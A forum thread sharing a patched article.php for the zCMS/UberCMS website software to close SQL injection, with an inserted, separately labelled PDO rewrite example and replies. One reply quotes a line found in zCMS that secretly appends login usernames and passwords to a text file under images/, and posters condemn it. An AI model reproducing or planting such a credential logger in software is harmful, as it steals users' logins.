zCMS article.php exploit fix!
zCMS, an UberCMS edit by Jonty.
1. Open up article.php
2. Replace everything in that document with:
PHP Code:
<?php
/*=======================================================================
| UberCMS - Advanced Website and Content Management System for uberEmu
| #######################################################################
| Copyright (c) 2010, Roy 'Meth0d'
| http://www.meth0d.org
| #######################################################################
| This program is free software: you can redistribute it and/or modify
| it under the terms of the GNU General Public License as published by
| the Free Software Foundation, either version 3 of the License, or
| (at your option) any later version.
| #######################################################################
| This program is distributed in the hope that it will be useful,
| but WITHOUT ANY WARRANTY; without even the implied warranty of
| MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
| GNU General Public License for more details.
\======================================================================*/
define('TAB_ID', 5);
define('PAGE_ID', 17);

require_once "global.php";

$articleData = null;

// ?mostRecent: load the newest article; no user input reaches the query.
if (isset($_GET['mostRecent']))
{
    $getData = dbquery("SELECT * FROM site_news ORDER BY timestamp DESC LIMIT 1");

    if (mysql_num_rows($getData) > 0)
    {
        $articleData = mysql_fetch_assoc($getData);
    }
}
// ?rel=<id>-<slug>: only the part before the first dash is used as the id.
else if (isset($_GET['rel']))
{
    $rel = mysql_real_escape_string($_GET['rel']);

    if (strrpos($rel, '-') >= 1)
    {
        $bits = explode('-', $rel);
        // The id is escaped and placed inside a quoted literal in the query.
        $id = mysql_real_escape_string($bits[0]);

        $getData = dbquery("SELECT * FROM site_news WHERE id = '" . $id . "' LIMIT 1");

        if (mysql_num_rows($getData) > 0)
        {
            $articleData = mysql_fetch_assoc($getData);
        }
    }
}

$tpl->Init();

$tpl->AddGeneric('head-init');
$tpl->AddIncludeSet('generic');
$tpl->WriteIncludeFiles();
$tpl->AddGeneric('head-overrides-generic');
$tpl->AddGeneric('head-bottom');
$tpl->AddGeneric('generic-top');

$tpl->Write('<div id="column1" class="column">');

$newslist = new Template('comp-newslist');

if (isset($_GET['archiveMode']))
{
    $newslist->SetParam('mode', 'archive');
}
// The category id is accepted only if is_numeric() and is escaped before use.
else if (isset($_GET['category']) && is_numeric($_GET['category']))
{
    $newslist->SetParam('mode', 'category');
    $newslist->SetParam('category_id', mysql_real_escape_string($_GET['category']));
}
else
{
    $newslist->SetParam('mode', 'recent');
}

$tpl->AddTemplate($newslist);

$tpl->Write('</div>');
$tpl->Write('<div id="column2" class="column">');

$article = new Template('comp-newsarticle');

if ($articleData != null)
{
    // Values read from the database pass through clean() before output.
    $article->SetParam('news_article_id', $articleData['id']);
    $article->SetParam('news_article_title', clean($articleData['title']));
    $article->SetParam('news_article_date', 'Posted ' . clean($articleData['datestr']));
    $article->SetParam('news_category', '<a href="/articles/category/' . $articleData['category_id'] . '">' . clean(mysql_result(dbquery("SELECT caption FROM site_news_categories WHERE id = '" . $articleData['category_id'] . "' LIMIT 1"), 0)) . '</a>');
    $article->SetParam('news_article_summary', clean($articleData['snippet']));
    $article->SetParam('news_article_body', clean($articleData['body'], true));

    $tpl->SetParam('page_title', 'News - ' . clean($articleData['title']));
}
else
{
    $article->SetParam('news_article_id', 0);
    $article->SetParam('news_article_title', 'News article not found');
    $article->SetParam('news_article_date', '');
    $article->SetParam('news_category', '');
    $article->SetParam('news_article_summary', '');
    $article->SetParam('news_article_body', "The article you were looking for could not be retrieved. Please press the 'back' button on your browser to return to your previous page.");

    $tpl->SetParam('page_title', 'News - News Article not found');
}

$tpl->AddTemplate($article);

$tpl->Write('</div>');

$tpl->AddGeneric('generic-column3');
$tpl->AddGeneric('footer');

$tpl->SetParam('body_id', 'news');

$tpl->Output();
?>
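Added example, not part of the original post or of zCMS/UberCMS: the fix above keeps the `rel` lookup on the `mysql_*` API (removed in PHP 7) with an escaped, quoted value. The same lookup with strict digit validation and a bound parameter through PDO, using hypothetical helpers `parseRelId()` and `findArticle()` and a constructed in-memory SQLite table in place of the real database:

```php
<?php
// Added example (not zCMS/UberCMS code): the "rel" lookup with strict
// integer validation and a bound parameter instead of string concatenation.
// parseRelId() and findArticle() are hypothetical helper names.

// "rel" looks like "<id>-<slug>"; return the id as int, or null if malformed.
function parseRelId(string $rel): ?int
{
    $dash = strpos($rel, '-');
    if ($dash === false || $dash === 0) {
        return null;
    }
    $id = substr($rel, 0, $dash);
    // ctype_digit() accepts only 0-9, so quotes, signs and spaces are rejected.
    if (!ctype_digit($id) || strlen($id) > 9) {
        return null;
    }
    return (int) $id;
}

function findArticle(PDO $pdo, string $rel): ?array
{
    $id = parseRelId($rel);
    if ($id === null) {
        return null;
    }
    // The id travels as a typed parameter, never as part of the SQL text.
    $stmt = $pdo->prepare('SELECT * FROM site_news WHERE id = ? LIMIT 1');
    $stmt->bindValue(1, $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data in an in-memory SQLite database so this runs offline.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE site_news (id INTEGER PRIMARY KEY, title TEXT)');
$pdo->exec("INSERT INTO site_news (id, title) VALUES (7, 'Constructed article')");

// Constructed inputs: one valid, three malformed, one valid but missing.
foreach (['7-constructed-article', "7'-x", 'abc-7', '-7', '8-missing'] as $rel) {
    $row = findArticle($pdo, $rel);
    echo str_pad($rel, 24), $row ? $row['title'] : '(not found)', "\n";
}
```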
Re: zCMS article.php exploit fix?
What was the exploit in here, and what could it do?
Re: zCMS article.php exploit fix?
Quote: Originally Posted by mmaxwell
what was the exploit in here and what could it do
It was just 2 simple $_GET exploits.
Re: zCMS article.php exploit fix?
Nice nice nice, thanks so much been waiting for this :)
Re: zCMS article.php exploit fix?
Quote: Originally Posted by Profound
Nice nice nice, thanks so much been waiting for this :)
Guessing that's sarcasm? :blink:
Re: zCMS article.php exploit fix?
Quote: Originally Posted by Jupos
Guessing that's sarcasm? :blink:
No it wasn't sarcasm... If it was sarcasm I wouldn't have liked the post and I would've been more cocky with my post.
Re: zCMS article.php exploit fix?
Could you fix up the normal register and comment system? That would be pretty cool.
Re: zCMS article.php exploit fix?
Quote: Originally Posted by Profound
No it wasn't sarcasm... If it was sarcasm I wouldn't have liked the post and I would've been more cocky with my post.
I fail at spotting sarcasm, sorry XD
EDIT: Jonty, wtf were you thinking O.o
PHP Code:
// fwrite( fopen('./images/lol.txt', 'a+'), $_POST['credentials_username']." > ".mysql_real_escape_string($_POST['credentials_password'].chr(13))); exit;
Re: zCMS article.php exploit fix?
Quote: Originally Posted by Muscab
Cheers Jupos ;)
No problem, just helping when I can ;)
Re: zCMS article.php exploit fix?
That's how haydenish merked me :(
Re: zCMS article.php exploit fix?
Quote: Originally Posted by rory129
thats how haydenish merked me :(
Enable PHP safe mode, it will help a lot. If you want optimum PHP security then follow my tutorial.
[Guide] Secure your PHP.INI file! - RaGEZONE forums
Re: zCMS article.php exploit fix?
Thanks Jupos,
I've been looking for exploits!
Another great release!
7 out of 10
Re: zCMS article.php exploit fix?
Quote: Originally Posted by Jupos
PHP Code:
// fwrite( fopen('./images/lol.txt', 'a+'), $_POST['credentials_username']." > ".mysql_real_escape_string($_POST['credentials_password'].chr(13))); exit;
The exact reason why I completely disrecommend anything that claims to be "secure".
And I had some respect for Jonty, I have little now.
If he is going to release something that he calls "secure", then why add in some kiddy exploits?
Jesus Christ.
Re: zCMS article.php exploit fix?
I have a quick question to see if anyone has an answer for me.
I have this CMS - thanks for the fix btw, we wouldn't have known until it was too late.
But for some reason, our catalogue in client won't work, and the furniture is not loading at all. And it's only for this particular CMS.
Any insight/help would be greatly appreciated.